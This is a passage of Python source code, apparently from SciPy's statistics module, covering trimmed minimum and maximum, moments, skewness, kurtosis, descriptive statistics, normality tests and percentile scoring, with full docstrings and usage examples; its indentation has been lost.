The following options are available (default is 'propagate'):
* 'propagate': returns nan
* 'raise': throws an error
* 'omit': performs the calculations ignoring nan values
Returns
-------
tmin : float, int or ndarray
Trimmed minimum.
Examples
--------
>>> from scipy import stats
>>> x = np.arange(20)
>>> stats.tmin(x)
0
>>> stats.tmin(x, 13)
13
>>> stats.tmin(x, 13, inclusive=False)
14
"""
a, axis = _chk_asarray(a, axis)
am = _mask_to_limits(a, (lowerlimit, None), (inclusive, False))
contains_nan, nan_policy = _contains_nan(am, nan_policy)
if contains_nan and nan_policy == 'omit':
am = ma.masked_invalid(am)
res = ma.minimum.reduce(am, axis).data
if res.ndim == 0:
return res[()]
return res
def tmax(a, upperlimit=None, axis=0, inclusive=True, nan_policy='propagate'):
"""Compute the trimmed maximum.
This function computes the maximum value of an array along a given axis,
while ignoring values larger than a specified upper limit.
Parameters
----------
a : array_like
Array of values.
upperlimit : None or float, optional
Values in the input array greater than the given limit will be ignored.
When upperlimit is None, then all values are used. The default value
is None.
axis : int or None, optional
Axis along which to operate. Default is 0. If None, compute over the
whole array `a`.
inclusive : {True, False}, optional
This flag determines whether values exactly equal to the upper limit
are included. The default value is True.
nan_policy : {'propagate', 'raise', 'omit'}, optional
Defines how to handle when input contains nan.
The following options are available (default is 'propagate'):
* 'propagate': returns nan
* 'raise': throws an error
* 'omit': performs the calculations ignoring nan values
Returns
-------
tmax : float, int or ndarray
Trimmed maximum.
Examples
--------
>>> from scipy import stats
>>> x = np.arange(20)
>>> stats.tmax(x)
19
>>> stats.tmax(x, 13)
13
>>> stats.tmax(x, 13, inclusive=False)
12
"""
a, axis = _chk_asarray(a, axis)
am = _mask_to_limits(a, (None, upperlimit), (False, inclusive))
contains_nan, nan_policy = _contains_nan(am, nan_policy)
if contains_nan and nan_policy == 'omit':
am = ma.masked_invalid(am)
res = ma.maximum.reduce(am, axis).data
if res.ndim == 0:
return res[()]
return res
def tstd(a, limits=None, inclusive=(True, True), axis=0, ddof=1):
"""Compute the trimmed sample standard deviation.
This function finds the sample standard deviation of given values,
ignoring values outside the given `limits`.
Parameters
----------
a : array_like
Array of values.
limits : None or (lower limit, upper limit), optional
Values in the input array less than the lower limit or greater than the
upper limit will be ignored. When limits is None, then all values are
used. Either of the limit values in the tuple can also be None
representing a half-open interval. The default value is None.
inclusive : (bool, bool), optional
A tuple consisting of the (lower flag, upper flag). These flags
determine whether values exactly equal to the lower or upper limits
are included. The default value is (True, True).
axis : int or None, optional
Axis along which to operate. Default is 0. If None, compute over the
whole array `a`.
ddof : int, optional
Delta degrees of freedom. Default is 1.
Returns
-------
tstd : float
Trimmed sample standard deviation.
Notes
-----
`tstd` computes the unbiased sample standard deviation, i.e. it uses a
correction factor ``n / (n - 1)``.
Examples
--------
>>> from scipy import stats
>>> x = np.arange(20)
>>> stats.tstd(x)
5.9160797830996161
>>> stats.tstd(x, (3,17))
4.4721359549995796
"""
return np.sqrt(tvar(a, limits, inclusive, axis, ddof))
def tsem(a, limits=None, inclusive=(True, True), axis=0, ddof=1):
"""Compute the trimmed standard error of the mean.
This function finds the standard error of the mean for given
values, ignoring values outside the given `limits`.
Parameters
----------
a : array_like
Array of values.
limits : None or (lower limit, upper limit), optional
Values in the input array less than the lower limit or greater than the
upper limit will be ignored. When limits is None, then all values are
used. Either of the limit values in the tuple can also be None
representing a half-open interval. The default value is None.
inclusive : (bool, bool), optional
A tuple consisting of the (lower flag, upper flag). These flags
determine whether values exactly equal to the lower or upper limits
are included. The default value is (True, True).
axis : int or None, optional
Axis along which to operate. Default is 0. If None, compute over the
whole array `a`.
ddof : int, optional
Delta degrees of freedom. Default is 1.
Returns
-------
tsem : float
Trimmed standard error of the mean.
Notes
-----
`tsem` uses unbiased sample standard deviation, i.e. it uses a
correction factor ``n / (n - 1)``.
Examples
--------
>>> from scipy import stats
>>> x = np.arange(20)
>>> stats.tsem(x)
1.3228756555322954
>>> stats.tsem(x, (3,17))
1.1547005383792515
"""
a = np.asarray(a).ravel()
if limits is None:
return a.std(ddof=ddof) / np.sqrt(a.size)
am = _mask_to_limits(a, limits, inclusive)
sd = np.sqrt(np.ma.var(am, ddof=ddof, axis=axis))
return sd / np.sqrt(am.count())
#####################################
# MOMENTS #
#####################################
def moment(a, moment=1, axis=0, nan_policy='propagate'):
r"""Calculate the nth moment about the mean for a sample.
A moment is a specific quantitative measure of the shape of a set of
points. It is often used to calculate coefficients of skewness and kurtosis
due to its close relationship with them.
Parameters
----------
a : array_like
Input array.
moment : int or array_like of ints, optional
Order of central moment that is returned. Default is 1.
axis : int or None, optional
Axis along which the central moment is computed. Default is 0.
If None, compute over the whole array `a`.
nan_policy : {'propagate', 'raise', 'omit'}, optional
Defines how to handle when input contains nan.
The following options are available (default is 'propagate'):
* 'propagate': returns nan
* 'raise': throws an error
* 'omit': performs the calculations ignoring nan values
Returns
-------
n-th central moment : ndarray or float
The appropriate moment along the given axis or over all values if axis
is None. The denominator for the moment calculation is the number of
observations, no degrees of freedom correction is done.
See Also
--------
kurtosis, skew, describe
Notes
-----
The k-th central moment of a data sample is:
.. math::
m_k = \frac{1}{n} \sum_{i = 1}^n (x_i - \bar{x})^k
Where n is the number of samples and x-bar is the mean. This function uses
exponentiation by squares [1]_ for efficiency.
References
----------
.. [1] https://eli.thegreenplace.net/2009/03/21/efficient-integer-exponentiation-algorithms
Examples
--------
>>> from scipy.stats import moment
>>> moment([1, 2, 3, 4, 5], moment=1)
0.0
>>> moment([1, 2, 3, 4, 5], moment=2)
2.0
"""
a, axis = _chk_asarray(a, axis)
contains_nan, nan_policy = _contains_nan(a, nan_policy)
if contains_nan and nan_policy == 'omit':
a = ma.masked_invalid(a)
return mstats_basic.moment(a, moment, axis)
if a.size == 0:
moment_shape = list(a.shape)
del moment_shape[axis]
dtype = a.dtype.type if a.dtype.kind in 'fc' else np.float64
# empty array, return nan(s) with shape matching `moment`
out_shape = (moment_shape if np.isscalar(moment)
else [len(moment)] + moment_shape)
if len(out_shape) == 0:
return dtype(np.nan)
else:
return np.full(out_shape, np.nan, dtype=dtype)
# for array_like moment input, return a value for each.
if not np.isscalar(moment):
mean = a.mean(axis, keepdims=True)
mmnt = [_moment(a, i, axis, mean=mean) for i in moment]
return np.array(mmnt)
else:
return _moment(a, moment, axis)
# Moment with optional pre-computed mean, equal to a.mean(axis, keepdims=True)
def _moment(a, moment, axis, *, mean=None):
if np.abs(moment - np.round(moment)) > 0:
raise ValueError("All moment parameters must be integers")
if moment == 0 or moment == 1:
# By definition the zeroth moment about the mean is 1, and the first
# moment is 0.
shape = list(a.shape)
del shape[axis]
dtype = a.dtype.type if a.dtype.kind in 'fc' else np.float64
if len(shape) == 0:
return dtype(1.0 if moment == 0 else 0.0)
else:
return (np.ones(shape, dtype=dtype) if moment == 0
else np.zeros(shape, dtype=dtype))
else:
# Exponentiation by squares: form exponent sequence
n_list = [moment]
current_n = moment
while current_n > 2:
if current_n % 2:
current_n = (current_n - 1) / 2
else:
current_n /= 2
n_list.append(current_n)
# Starting point for exponentiation by squares
mean = a.mean(axis, keepdims=True) if mean is None else mean
a_zero_mean = a - mean
if n_list[-1] == 1:
s = a_zero_mean.copy()
else:
s = a_zero_mean**2
# Perform multiplications
for n in n_list[-2::-1]:
s = s**2
if n % 2:
s *= a_zero_mean
return np.mean(s, axis)
@_axis_nan_policy_factory(
lambda x: x, result_unpacker=lambda x: (x,), n_outputs=1
)
def skew(a, axis=0, bias=True, nan_policy='propagate'):
r"""Compute the sample skewness of a data set.
For normally distributed data, the skewness should be about zero. For
unimodal continuous distributions, a skewness value greater than zero means
that there is more weight in the right tail of the distribution. The
function `skewtest` can be used to determine if the skewness value
is close enough to zero, statistically speaking.
Parameters
----------
a : ndarray
Input array.
axis : int or None, optional
Axis along which skewness is calculated. Default is 0.
If None, compute over the whole array `a`.
bias : bool, optional
If False, then the calculations are corrected for statistical bias.
nan_policy : {'propagate', 'raise', 'omit'}, optional
Defines how to handle when input contains nan.
The following options are available (default is 'propagate'):
* 'propagate': returns nan
* 'raise': throws an error
* 'omit': performs the calculations ignoring nan values
Returns
-------
skewness : ndarray
The skewness of values along an axis, returning 0 where all values are
equal.
Notes
-----
The sample skewness is computed as the Fisher-Pearson coefficient
of skewness, i.e.
.. math::
g_1=\frac{m_3}{m_2^{3/2}}
where
.. math::
m_i=\frac{1}{N}\sum_{n=1}^N(x[n]-\bar{x})^i
is the biased sample :math:`i\texttt{th}` central moment, and
:math:`\bar{x}` is
the sample mean. If ``bias`` is False, the calculations are
corrected for bias and the value computed is the adjusted
Fisher-Pearson standardized moment coefficient, i.e.
.. math::
G_1=\frac{k_3}{k_2^{3/2}}=
\frac{\sqrt{N(N-1)}}{N-2}\frac{m_3}{m_2^{3/2}}.
References
----------
.. [1] Zwillinger, D. and Kokoska, S. (2000). CRC Standard
Probability and Statistics Tables and Formulae. Chapman & Hall: New
York. 2000.
Section 2.2.24.1
Examples
--------
>>> from scipy.stats import skew
>>> skew([1, 2, 3, 4, 5])
0.0
>>> skew([2, 8, 0, 4, 1, 9, 9, 0])
0.2650554122698573
"""
a, axis = _chk_asarray(a, axis)
n = a.shape[axis]
contains_nan, nan_policy = _contains_nan(a, nan_policy)
if contains_nan and nan_policy == 'omit':
a = ma.masked_invalid(a)
return mstats_basic.skew(a, axis, bias)
mean = a.mean(axis, keepdims=True)
m2 = _moment(a, 2, axis, mean=mean)
m3 = _moment(a, 3, axis, mean=mean)
with np.errstate(all='ignore'):
zero = (m2 <= (np.finfo(m2.dtype).resolution * mean.squeeze(axis))**2)
vals = np.where(zero, 0, m3 / m2**1.5)
if not bias:
can_correct = ~zero & (n > 2)
if can_correct.any():
m2 = np.extract(can_correct, m2)
m3 = np.extract(can_correct, m3)
nval = np.sqrt((n - 1.0) * n) / (n - 2.0) * m3 / m2**1.5
np.place(vals, can_correct, nval)
if vals.ndim == 0:
return vals.item()
return vals
@_axis_nan_policy_factory(
lambda x: x, result_unpacker=lambda x: (x,), n_outputs=1
)
def kurtosis(a, axis=0, fisher=True, bias=True, nan_policy='propagate'):
"""Compute the kurtosis (Fisher or Pearson) of a dataset.
Kurtosis is the fourth central moment divided by the square of the
variance. If Fisher's definition is used, then 3.0 is subtracted from
the result to give 0.0 for a normal distribution.
If bias is False then the kurtosis is calculated using k statistics to
eliminate bias coming from biased moment estimators
Use `kurtosistest` to see if result is close enough to normal.
Parameters
----------
a : array
Data for which the kurtosis is calculated.
axis : int or None, optional
Axis along which the kurtosis is calculated. Default is 0.
If None, compute over the whole array `a`.
fisher : bool, optional
If True, Fisher's definition is used (normal ==> 0.0). If False,
Pearson's definition is used (normal ==> 3.0).
bias : bool, optional
If False, then the calculations are corrected for statistical bias.
nan_policy : {'propagate', 'raise', 'omit'}, optional
Defines how to handle when input contains nan. 'propagate' returns nan,
'raise' throws an error, 'omit' performs the calculations ignoring nan
values. Default is 'propagate'.
Returns
-------
kurtosis : array
The kurtosis of values along an axis. If all values are equal,
return -3 for Fisher's definition and 0 for Pearson's definition.
References
----------
.. [1] Zwillinger, D. and Kokoska, S. (2000). CRC Standard
Probability and Statistics Tables and Formulae. Chapman & Hall: New
York. 2000.
Examples
--------
In Fisher's definiton, the kurtosis of the normal distribution is zero.
In the following example, the kurtosis is close to zero, because it was
calculated from the dataset, not from the continuous distribution.
>>> from scipy.stats import norm, kurtosis
>>> data = norm.rvs(size=1000, random_state=3)
>>> kurtosis(data)
-0.06928694200380558
The distribution with a higher kurtosis has a heavier tail.
The zero valued kurtosis of the normal distribution in Fisher's definition
can serve as a reference point.
>>> import matplotlib.pyplot as plt
>>> import scipy.stats as stats
>>> from scipy.stats import kurtosis
>>> x = np.linspace(-5, 5, 100)
>>> ax = plt.subplot()
>>> distnames = ['laplace', 'norm', 'uniform']
>>> for distname in distnames:
... if distname == 'uniform':
... dist = getattr(stats, distname)(loc=-2, scale=4)
... else:
... dist = getattr(stats, distname)
... data = dist.rvs(size=1000)
... kur = kurtosis(data, fisher=True)
... y = dist.pdf(x)
... ax.plot(x, y, label="{}, {}".format(distname, round(kur, 3)))
... ax.legend()
The Laplace distribution has a heavier tail than the normal distribution.
The uniform distribution (which has negative kurtosis) has the thinnest
tail.
"""
a, axis = _chk_asarray(a, axis)
contains_nan, nan_policy = _contains_nan(a, nan_policy)
if contains_nan and nan_policy == 'omit':
a = ma.masked_invalid(a)
return mstats_basic.kurtosis(a, axis, fisher, bias)
n = a.shape[axis]
mean = a.mean(axis, keepdims=True)
m2 = _moment(a, 2, axis, mean=mean)
m4 = _moment(a, 4, axis, mean=mean)
with np.errstate(all='ignore'):
zero = (m2 <= (np.finfo(m2.dtype).resolution * mean.squeeze(axis))**2)
vals = np.where(zero, 0, m4 / m2**2.0)
if not bias:
can_correct = ~zero & (n > 3)
if can_correct.any():
m2 = np.extract(can_correct, m2)
m4 = np.extract(can_correct, m4)
nval = 1.0/(n-2)/(n-3) * ((n**2-1.0)*m4/m2**2.0 - 3*(n-1)**2.0)
np.place(vals, can_correct, nval + 3.0)
if vals.ndim == 0:
vals = vals.item() # array scalar
return vals - 3 if fisher else vals
DescribeResult = namedtuple('DescribeResult',
('nobs', 'minmax', 'mean', 'variance', 'skewness',
'kurtosis'))
def describe(a, axis=0, ddof=1, bias=True, nan_policy='propagate'):
"""Compute several descriptive statistics of the passed array.
Parameters
----------
a : array_like
Input data.
axis : int or None, optional
Axis along which statistics are calculated. Default is 0.
If None, compute over the whole array `a`.
ddof : int, optional
Delta degrees of freedom (only for variance). Default is 1.
bias : bool, optional
If False, then the skewness and kurtosis calculations are corrected
for statistical bias.
nan_policy : {'propagate', 'raise', 'omit'}, optional
Defines how to handle when input contains nan.
The following options are available (default is 'propagate'):
* 'propagate': returns nan
* 'raise': throws an error
* 'omit': performs the calculations ignoring nan values
Returns
-------
nobs : int or ndarray of ints
Number of observations (length of data along `axis`).
When 'omit' is chosen as nan_policy, the length along each axis
slice is counted separately.
minmax: tuple of ndarrays or floats
Minimum and maximum value of `a` along the given axis.
mean : ndarray or float
Arithmetic mean of `a` along the given axis.
variance : ndarray or float
Unbiased variance of `a` along the given axis; denominator is number
of observations minus one.
skewness : ndarray or float
Skewness of `a` along the given axis, based on moment calculations
with denominator equal to the number of observations, i.e. no degrees
of freedom correction.
kurtosis : ndarray or float
Kurtosis (Fisher) of `a` along the given axis. The kurtosis is
normalized so that it is zero for the normal distribution. No
degrees of freedom are used.
See Also
--------
skew, kurtosis
Examples
--------
>>> from scipy import stats
>>> a = np.arange(10)
>>> stats.describe(a)
DescribeResult(nobs=10, minmax=(0, 9), mean=4.5,
variance=9.166666666666666, skewness=0.0,
kurtosis=-1.2242424242424244)
>>> b = [[1, 2], [3, 4]]
>>> stats.describe(b)
DescribeResult(nobs=2, minmax=(array([1, 2]), array([3, 4])),
mean=array([2., 3.]), variance=array([2., 2.]),
skewness=array([0., 0.]), kurtosis=array([-2., -2.]))
"""
a, axis = _chk_asarray(a, axis)
contains_nan, nan_policy = _contains_nan(a, nan_policy)
if contains_nan and nan_policy == 'omit':
a = ma.masked_invalid(a)
return mstats_basic.describe(a, axis, ddof, bias)
if a.size == 0:
raise ValueError("The input must not be empty.")
n = a.shape[axis]
mm = (np.min(a, axis=axis), np.max(a, axis=axis))
m = np.mean(a, axis=axis)
v = np.var(a, axis=axis, ddof=ddof)
sk = skew(a, axis, bias=bias)
kurt = kurtosis(a, axis, bias=bias)
return DescribeResult(n, mm, m, v, sk, kurt)
#####################################
# NORMALITY TESTS #
#####################################
def _normtest_finish(z, alternative):
"""Common code between all the normality-test functions."""
if alternative == 'less':
prob = distributions.norm.cdf(z)
elif alternative == 'greater':
prob = distributions.norm.sf(z)
elif alternative == 'two-sided':
prob = 2 * distributions.norm.sf(np.abs(z))
else:
raise ValueError("alternative must be "
"'less', 'greater' or 'two-sided'")
if z.ndim == 0:
z = z[()]
return z, prob
SkewtestResult = namedtuple('SkewtestResult', ('statistic', 'pvalue'))
def skewtest(a, axis=0, nan_policy='propagate', alternative='two-sided'):
"""Test whether the skew is different from the normal distribution.
This function tests the null hypothesis that the skewness of
the population that the sample was drawn from is the same
as that of a corresponding normal distribution.
Parameters
----------
a : array
The data to be tested.
axis : int or None, optional
Axis along which statistics are calculated. Default is 0.
If None, compute over the whole array `a`.
nan_policy : {'propagate', 'raise', 'omit'}, optional
Defines how to handle when input contains nan.
The following options are available (default is 'propagate'):
* 'propagate': returns nan
* 'raise': throws an error
* 'omit': performs the calculations ignoring nan values
alternative : {'two-sided', 'less', 'greater'}, optional
Defines the alternative hypothesis. Default is 'two-sided'.
The following options are available:
* 'two-sided': the skewness of the distribution underlying the sample
is different from that of the normal distribution (i.e. 0)
* 'less': the skewness of the distribution underlying the sample
is less than that of the normal distribution
* 'greater': the skewness of the distribution underlying the sample
is greater than that of the normal distribution
.. versionadded:: 1.7.0
Returns
-------
statistic : float
The computed z-score for this test.
pvalue : float
The p-value for the hypothesis test.
Notes
-----
The sample size must be at least 8.
References
----------
.. [1] R. B. D'Agostino, A. J. Belanger and R. B. D'Agostino Jr.,
"A suggestion for using powerful and informative tests of
normality", American Statistician 44, pp. 316-321, 1990.
Examples
--------
>>> from scipy.stats import skewtest
>>> skewtest([1, 2, 3, 4, 5, 6, 7, 8])
SkewtestResult(statistic=1.0108048609177787, pvalue=0.3121098361421897)
>>> skewtest([2, 8, 0, 4, 1, 9, 9, 0])
SkewtestResult(statistic=0.44626385374196975, pvalue=0.6554066631275459)
>>> skewtest([1, 2, 3, 4, 5, 6, 7, 8000])
SkewtestResult(statistic=3.571773510360407, pvalue=0.0003545719905823133)
>>> skewtest([100, 100, 100, 100, 100, 100, 100, 101])
SkewtestResult(statistic=3.5717766638478072, pvalue=0.000354567720281634)
>>> skewtest([1, 2, 3, 4, 5, 6, 7, 8], alternative='less')
SkewtestResult(statistic=1.0108048609177787, pvalue=0.8439450819289052)
>>> skewtest([1, 2, 3, 4, 5, 6, 7, 8], alternative='greater')
SkewtestResult(statistic=1.0108048609177787, pvalue=0.15605491807109484)
"""
a, axis = _chk_asarray(a, axis)
contains_nan, nan_policy = _contains_nan(a, nan_policy)
if contains_nan and nan_policy == 'omit':
a = ma.masked_invalid(a)
return mstats_basic.skewtest(a, axis, alternative)
if axis is None:
a = np.ravel(a)
axis = 0
b2 = skew(a, axis)
n = a.shape[axis]
if n < 8:
raise ValueError(
"skewtest is not valid with less than 8 samples; %i samples"
" were given." % int(n))
y = b2 * math.sqrt(((n + 1) * (n + 3)) / (6.0 * (n - 2)))
beta2 = (3.0 * (n**2 + 27*n - 70) * (n+1) * (n+3) /
((n-2.0) * (n+5) * (n+7) * (n+9)))
W2 = -1 + math.sqrt(2 * (beta2 - 1))
delta = 1 / math.sqrt(0.5 * math.log(W2))
alpha = math.sqrt(2.0 / (W2 - 1))
y = np.where(y == 0, 1, y)
Z = delta * np.log(y / alpha + np.sqrt((y / alpha)**2 + 1))
return SkewtestResult(*_normtest_finish(Z, alternative))
KurtosistestResult = namedtuple('KurtosistestResult', ('statistic', 'pvalue'))
def kurtosistest(a, axis=0, nan_policy='propagate', alternative='two-sided'):
"""Test whether a dataset has normal kurtosis.
This function tests the null hypothesis that the kurtosis
of the population from which the sample was drawn is that
of the normal distribution.
Parameters
----------
a : array
Array of the sample data.
axis : int or None, optional
Axis along which to compute test. Default is 0. If None,
compute over the whole array `a`.
nan_policy : {'propagate', 'raise', 'omit'}, optional
Defines how to handle when input contains nan.
The following options are available (default is 'propagate'):
* 'propagate': returns nan
* 'raise': throws an error
* 'omit': performs the calculations ignoring nan values
alternative : {'two-sided', 'less', 'greater'}, optional
Defines the alternative hypothesis.
The following options are available (default is 'two-sided'):
* 'two-sided': the kurtosis of the distribution underlying the sample
is different from that of the normal distribution
* 'less': the kurtosis of the distribution underlying the sample
is less than that of the normal distribution
* 'greater': the kurtosis of the distribution underlying the sample
is greater than that of the normal distribution
.. versionadded:: 1.7.0
Returns
-------
statistic : float
The computed z-score for this test.
pvalue : float
The p-value for the hypothesis test.
Notes
-----
Valid only for n>20. This function uses the method described in [1]_.
References
----------
.. [1] see e.g. F. J. Anscombe, W. J. Glynn, "Distribution of the kurtosis
statistic b2 for normal samples", Biometrika, vol. 70, pp. 227-234, 1983.
Examples
--------
>>> from scipy.stats import kurtosistest
>>> kurtosistest(list(range(20)))
KurtosistestResult(statistic=-1.7058104152122062, pvalue=0.08804338332528348)
>>> kurtosistest(list(range(20)), alternative='less')
KurtosistestResult(statistic=-1.7058104152122062, pvalue=0.04402169166264174)
>>> kurtosistest(list(range(20)), alternative='greater')
KurtosistestResult(statistic=-1.7058104152122062, pvalue=0.9559783083373583)
>>> rng = np.random.default_rng()
>>> s = rng.normal(0, 1, 1000)
>>> kurtosistest(s)
KurtosistestResult(statistic=-1.475047944490622, pvalue=0.14019965402996987)
"""
a, axis = _chk_asarray(a, axis)
contains_nan, nan_policy = _contains_nan(a, nan_policy)
if contains_nan and nan_policy == 'omit':
a = ma.masked_invalid(a)
return mstats_basic.kurtosistest(a, axis, alternative)
n = a.shape[axis]
if n < 5:
raise ValueError(
"kurtosistest requires at least 5 observations; %i observations"
" were given." % int(n))
if n < 20:
warnings.warn("kurtosistest only valid for n>=20 ... continuing "
"anyway, n=%i" % int(n))
b2 = kurtosis(a, axis, fisher=False)
E = 3.0*(n-1) / (n+1)
varb2 = 24.0*n*(n-2)*(n-3) / ((n+1)*(n+1.)*(n+3)*(n+5)) # [1]_ Eq. 1
x = (b2-E) / np.sqrt(varb2) # [1]_ Eq. 4
# [1]_ Eq. 2:
sqrtbeta1 = 6.0*(n*n-5*n+2)/((n+7)*(n+9)) * np.sqrt((6.0*(n+3)*(n+5)) /
(n*(n-2)*(n-3)))
# [1]_ Eq. 3:
A = 6.0 + 8.0/sqrtbeta1 * (2.0/sqrtbeta1 + np.sqrt(1+4.0/(sqrtbeta1**2)))
term1 = 1 - 2/(9.0*A)
denom = 1 + x*np.sqrt(2/(A-4.0))
term2 = np.sign(denom) * np.where(denom == 0.0, np.nan,
np.power((1-2.0/A)/np.abs(denom), 1/3.0))
if np.any(denom == 0):
msg = "Test statistic not defined in some cases due to division by " \
"zero. Return nan in that case..."
warnings.warn(msg, RuntimeWarning)
Z = (term1 - term2) / np.sqrt(2/(9.0*A)) # [1]_ Eq. 5
# zprob uses upper tail, so Z needs to be positive
return KurtosistestResult(*_normtest_finish(Z, alternative))
NormaltestResult = namedtuple('NormaltestResult', ('statistic', 'pvalue'))
def normaltest(a, axis=0, nan_policy='propagate'):
"""Test whether a sample differs from a normal distribution.
This function tests the null hypothesis that a sample comes
from a normal distribution. It is based on D'Agostino and
Pearson's [1]_, [2]_ test that combines skew and kurtosis to
produce an omnibus test of normality.
Parameters
----------
a : array_like
The array containing the sample to be tested.
axis : int or None, optional
Axis along which to compute test. Default is 0. If None,
compute over the whole array `a`.
nan_policy : {'propagate', 'raise', 'omit'}, optional
Defines how to handle when input contains nan.
The following options are available (default is 'propagate'):
* 'propagate': returns nan
* 'raise': throws an error
* 'omit': performs the calculations ignoring nan values
Returns
-------
statistic : float or array
``s^2 + k^2``, where ``s`` is the z-score returned by `skewtest` and
``k`` is the z-score returned by `kurtosistest`.
pvalue : float or array
A 2-sided chi squared probability for the hypothesis test.
References
----------
.. [1] D'Agostino, R. B. (1971), "An omnibus test of normality for
moderate and large sample size", Biometrika, 58, 341-348
.. [2] D'Agostino, R. and Pearson, E. S. (1973), "Tests for departure from
normality", Biometrika, 60, 613-622
Examples
--------
>>> from scipy import stats
>>> rng = np.random.default_rng()
>>> pts = 1000
>>> a = rng.normal(0, 1, size=pts)
>>> b = rng.normal(2, 1, size=pts)
>>> x = np.concatenate((a, b))
>>> k2, p = stats.normaltest(x)
>>> alpha = 1e-3
>>> print("p = {:g}".format(p))
p = 8.4713e-19
>>> if p < alpha: # null hypothesis: x comes from a normal distribution
... print("The null hypothesis can be rejected")
... else:
... print("The null hypothesis cannot be rejected")
The null hypothesis can be rejected
"""
a, axis = _chk_asarray(a, axis)
contains_nan, nan_policy = _contains_nan(a, nan_policy)
if contains_nan and nan_policy == 'omit':
a = ma.masked_invalid(a)
return mstats_basic.normaltest(a, axis)
s, _ = skewtest(a, axis)
k, _ = kurtosistest(a, axis)
k2 = s*s + k*k
return NormaltestResult(k2, distributions.chi2.sf(k2, 2))
Jarque_beraResult = namedtuple('Jarque_beraResult', ('statistic', 'pvalue'))
def jarque_bera(x):
"""Perform the Jarque-Bera goodness of fit test on sample data.
The Jarque-Bera test tests whether the sample data has the skewness and
kurtosis matching a normal distribution.
Note that this test only works for a large enough number of data samples
(>2000) as the test statistic asymptotically has a Chi-squared distribution
with 2 degrees of freedom.
Parameters
----------
x : array_like
Observations of a random variable.
Returns
-------
jb_value : float
The test statistic.
p : float
The p-value for the hypothesis test.
References
----------
.. [1] Jarque, C. and Bera, A. (1980) "Efficient tests for normality,
homoscedasticity and serial independence of regression residuals",
6 Econometric Letters 255-259.
Examples
--------
>>> from scipy import stats
>>> rng = np.random.default_rng()
>>> x = rng.normal(0, 1, 100000)
>>> jarque_bera_test = stats.jarque_bera(x)
>>> jarque_bera_test
Jarque_beraResult(statistic=3.3415184718131554, pvalue=0.18810419594996775)
>>> jarque_bera_test.statistic
3.3415184718131554
>>> jarque_bera_test.pvalue
0.18810419594996775
"""
x = np.asarray(x)
n = x.size
if n == 0:
raise ValueError('At least one observation is required.')
mu = x.mean()
diffx = x - mu
skewness = (1 / n * np.sum(diffx**3)) / (1 / n * np.sum(diffx**2))**(3 / 2.)
kurtosis = (1 / n * np.sum(diffx**4)) / (1 / n * np.sum(diffx**2))**2
jb_value = n / 6 * (skewness**2 + (kurtosis - 3)**2 / 4)
p = 1 - distributions.chi2.cdf(jb_value, 2)
return Jarque_beraResult(jb_value, p)
#####################################
# FREQUENCY FUNCTIONS #
#####################################
# deindent to work around numpy/gh-16202
@np.deprecate(
message="`itemfreq` is deprecated and will be removed in a "
"future version. Use instead `np.unique(..., return_counts=True)`")
def itemfreq(a):
"""
Return a 2-D array of item frequencies.
Parameters
----------
a : (N,) array_like
Input array.
Returns
-------
itemfreq : (K, 2) ndarray
A 2-D frequency table. Column 1 contains sorted, unique values from
`a`, column 2 contains their respective counts.
Examples
--------
>>> from scipy import stats
>>> a = np.array([1, 1, 5, 0, 1, 2, 2, 0, 1, 4])
>>> stats.itemfreq(a)
array([[ 0., 2.],
[ 1., 4.],
[ 2., 2.],
[ 4., 1.],
[ 5., 1.]])
>>> np.bincount(a)
array([2, 4, 2, 0, 1, 1])
>>> stats.itemfreq(a/10.)
array([[ 0. , 2. ],
[ 0.1, 4. ],
[ 0.2, 2. ],
[ 0.4, 1. ],
[ 0.5, 1. ]])
"""
items, inv = np.unique(a, return_inverse=True)
freq = np.bincount(inv)
return np.array([items, freq]).T
def scoreatpercentile(a, per, limit=(), interpolation_method='fraction',
axis=None):
"""Calculate the score at a given percentile of the input sequence.
For example, the score at `per=50` is the median. If the desired quantile
lies between two data points, we interpolate between them, according to
the value of `interpolation`. If the parameter `limit` is provided, it
should be a tuple (lower, upper) of two values.
Parameters
----------
a : array_like
A 1-D array of values from which to extract score.
per : array_like
Percentile(s) at which to extract score. Values should be in range
[0,100].
limit : tuple, optional
Tuple of two scalars, the lower and upper limits within which to
compute the percentile. Values of `a` outside
this (closed) interval will be ignored.
interpolation_method : {'fraction', 'lower', 'higher'}, optional
Specifies the interpolation method to use,
when the desired quantile lies between two data points `i` and `j`
The following options are available (default is 'fraction'):
* 'fraction': ``i + (j - i) * fraction`` where ``fraction`` is the
fractional part of the index surrounded by ``i`` and ``j``
* 'lower': ``i``
* 'higher': ``j``
axis : int, optional
Axis along which the percentiles are computed. Default is None. If
None, compute over the whole array `a`.
Returns
-------
score : float or ndarray
Score at percentile(s).
See Also
--------
percentileofscore, numpy.percentile
Notes
-----
This function will become obsolete in the future.
For NumPy 1.9 and higher, `numpy.percentile` provides all the functionality
that `scoreatpercentile` provides. And it's significantly faster.
Therefore it's recommended to use `numpy.percentile` for users that have
numpy >= 1.9.
Examples
--------
>>> from scipy import stats
>>> a = np.arange(100)
>>> stats.scoreatpercentile(a, 50)
49.5
"""
# adapted from NumPy's percentile function. When we require numpy >= 1.8,
# the implementation of this function can be replaced by np.percentile.
a = np.asarray(a)
if a.size == 0:
# empty array, return nan(s) with shape matching `per`
if np.isscalar(per):
return np.nan
else:
return np.full(np.asarray(per).shape, np.nan, dtype=np.float64)
if limit:
a = a[(limit[0] <= a) & (a <= limit[1])]
sorted_ = np.sort(a, axis=axis)
if axis is None:
axis = 0
return _compute_qth_percentile(sorted_, per, interpolation_method, axis)
# handle sequence of per's without calling sort multiple times
def _compute_qth_percentile(sorted_, per, interpolation_method, axis):
if not np.isscalar(per):
score = [_compute_qth_percentile(sorted_, i,
interpolation_method, axis)
for i in per]
return np.array(score)
if not (0 <= per <= 100):
raise ValueError("percentile must be in the range [0, 100]")
indexer = [slice(None)] * sorted_.ndim
idx = per / 100. * (sorted_.shape[axis] - 1)
if int(idx) != idx:
# round fractional indices according to interpolation method
if interpolation_method == 'lower':
idx = int(np.floor(idx))
elif interpolation_method == 'higher':
idx = int(np.ceil(idx))
elif interpolation_method == 'fraction':
pass # keep idx as fraction and interpolate
else:
raise ValueError("interpolation_method can only be 'fraction', "
"'lower' or 'higher'")
i = int(idx)
if i == idx:
indexer[axis] = slice(i, i + 1)
weights = array(1)
sumval = 1.0
else:
indexer[axis] = slice(i, i + 2)
j = i + 1
weights = array([(j - idx), (idx - i)], float)
wshape = [1] * sorted_.ndim
wshape[axis] = 2
weights.shape = wshape
sumval = weights.sum()
# Use np.add.reduce (== np.sum but a little faster) to coerce data type
return np.add.reduce(sorted_[tuple(indexer)] * weights, axis=axis) / sumval
